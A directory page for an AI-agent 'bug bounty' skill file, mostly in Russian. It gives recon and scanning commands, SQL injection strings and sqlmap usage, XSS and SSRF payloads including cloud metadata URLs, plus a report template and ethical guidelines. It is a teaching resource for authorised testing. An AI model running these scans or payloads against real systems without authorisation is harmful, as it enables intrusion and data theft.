Vibe Index
🎯

bug-bounty-program

🎯Skill

from dengineproblem/agents-monorepo

VibeIndex|
What it does

Identifies and reports cybersecurity vulnerabilities through comprehensive reconnaissance, manual testing, and automated scanning techniques across web applications and systems.

📦

Part of

dengineproblem/agents-monorepo(106 items)

bug-bounty-program

Installation

DockerRun with Docker
docker compose up -d --build agent-brain
DockerRun with Docker
docker compose up -d --build agent-service
git cloneClone repository
git clone <repo-url>
DockerRun with Docker
docker compose up -d --build
Shell ScriptRun shell script
./test-video-upload.sh ./path/to/video.mp4

+ 3 more commands

📖 Extracted from docs: dengineproblem/agents-monorepo
Need more details? View full documentation on GitHub
2Installs
2
-
AddedFeb 4, 2026
View on GitHubBack to Skills

Skill Details

SKILL.md

Эксперт по bug bounty. Используй для поиска уязвимостей, написания отчётов, responsible disclosure и penetration testing.

Overview

# Bug Bounty Program Specialist

Эксперт по исследованию уязвимостей и bug bounty hunting.

Методология тестирования

OWASP Top 10 Focus

  1. Injection (SQL, NoSQL, LDAP, OS commands)
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Распределение усилий

  • Reconnaissance: 30%
  • Manual testing: 50%
  • Automated scanning: 20%

Reconnaissance

Subdomain Enumeration

```bash

# Пассивное перечисление

amass enum -passive -d target.com -o subdomains.txt

# Активное перечисление

subfinder -d target.com -all -o subfinder.txt

# DNS брутфорс

gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

# Объединение результатов

cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt

```

Technology Stack Identification

```bash

# Wappalyzer CLI

wappalyzer https://target.com

# WhatWeb

whatweb -a 3 https://target.com

# Nuclei technology detection

nuclei -u https://target.com -t technologies/

```

Port Scanning

```bash

# Быстрое сканирование

nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

# Сканирование сервисов

nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services

```

SQL Injection Testing

Manual Detection

```sql

-- Error-based

' OR '1'='1

' AND '1'='2

' UNION SELECT NULL--

-- Time-based blind

'; WAITFOR DELAY '00:00:05'--

' OR SLEEP(5)--

-- Boolean-based blind

' AND 1=1--

' AND 1=2--

```

SQLMap

```bash

# Basic injection test

sqlmap -u "https://target.com/page?id=1" --batch

# With authentication

sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch

# POST data

sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch

# Database enumeration

sqlmap -u "https://target.com/page?id=1" --dbs --batch

sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch

```

XSS Testing

Payload Types

```javascript

// Reflected XSS

// DOM-based XSS

javascript:alert('XSS')

data:text/html,

// Bypass filters

// Stored XSS via different contexts

">

'-alert('XSS')-'

```

Context-Specific Payloads

```javascript

// In HTML attribute

" onfocus=alert('XSS') autofocus="

' onfocus=alert('XSS') autofocus='

// In JavaScript string

';alert('XSS');//

"-alert('XSS')-"

// In URL parameter

javascript:alert('XSS')

data:text/html,

```

SSRF Testing

Basic Payloads

```

# Localhost bypass

http://127.0.0.1

http://localhost

http://[::1]

http://0.0.0.0

http://127.1

http://0177.0.0.1

# Cloud metadata

http://169.254.169.254/latest/meta-data/

http://metadata.google.internal/

```

Detection Methods

```python

# Out-of-band detection using Burp Collaborator

url = "http://your-collaborator-id.burpcollaborator.net"

# Webhook.site for testing

url = "https://webhook.site/unique-id"

```

Report Writing

Structure

```markdown

# Vulnerability Report

Summary

[One-line description]

Severity

[Critical/High/Medium/Low] - CVSS Score: X.X

Affected Component

[URL/Endpoint/Feature]

Description

[Detailed technical explanation]

Steps to Reproduce

  1. [Step 1]
  2. [Step 2]
  3. [Step 3]

Proof of Concept

[Screenshots, code, requests]

Impact

[Business/technical impact]

Remediation

[Specific recommendations]

References

[CVE, OWASP, etc.]

```

CVSS Calculator Factors

  • Attack Vector (AV): Network/Adjacent/Local/Physical
  • Attack Complexity (AC): Low/High
  • Privileges Required (PR): None/Low/High
  • User Interaction (UI): None/Required
  • Scope (S): Unchanged/Changed
  • Confidentiality Impact (C): None/Low/High
  • Integrity Impact (I): None/Low/High
  • Availability Impact (A): None/Low/High

Tools Checklist

Reconnaissance

  • [ ] Amass / Subfinder
  • [ ] Nmap
  • [ ] Shodan
  • [ ] Google Dorks

Web Testing

  • [ ] Burp Suite
  • [ ] OWASP ZAP
  • [ ] SQLMap
  • [ ] Nuclei

Automation

  • [ ] ffuf (fuzzing)
  • [ ] httpx (probing)
  • [ ] waybackurls
  • [ ] gau (URLs gathering)

Ethical Guidelines

  1. Stay in scope — тестируйте только разрешенные цели
  2. Don't be destructive — избегайте DoS и потери данных
  3. Protect data — не распространяйте найденные данные
  4. Report responsibly — следуйте disclosure policy
  5. Document everything — ведите детальные записи
  6. Respect rate limits — не перегружайте системы

Program Selection Strategy

Criteria

  • Response time history
  • Bounty amounts
  • Scope breadth
  • Program maturity
  • Community feedback

Priority Matrix

| Program Type | Skill Level | Potential |

|--------------|-------------|-----------|

| New programs | Any | High |

| Broad scope | Intermediate | Medium |

| Narrow scope | Expert | Low-Medium |

| VDP only | Beginner | Low |

More from this repository10

🎯
b2b-saas-marketing🎯Skill

Provides expert B2B SaaS marketing strategies for demand generation, growth marketing, lead optimization, and key performance metrics.

🎯
creative-copywriter🎯Skill

Generates high-converting storytelling, offers, posts, and video texts by extracting key business context and applying targeted copywriting techniques.

🎯
ios-unit-test🎯Skill

Generates comprehensive iOS unit tests using XCTest, following best practices like AAA pattern, mocking, and dependency injection for robust test coverage.

🎯
k6-load-test🎯Skill

Generates and runs performance load tests using k6 to simulate user traffic and measure system response under various load conditions.

🎯
abm-specialist🎯Skill

Enables AI agents to perform advanced account-based marketing (ABM) strategies, targeting and analyzing potential enterprise clients with precision.

🎯
influencer-outreach-template🎯Skill

Generates personalized, high-converting influencer outreach templates with strategic personalization and compelling communication approaches.

🎯
openapi-documentation🎯Skill

openapi-documentation skill from dengineproblem/agents-monorepo

🎯
code-documentation-generator🎯Skill

code-documentation-generator skill from dengineproblem/agents-monorepo

🎯
api-tutorial-writer🎯Skill

api-tutorial-writer skill from dengineproblem/agents-monorepo

🎯
expo-config-setup🎯Skill

Configures Expo React Native projects with dynamic app.json settings, platform-specific overrides, and environment-aware deployment strategies.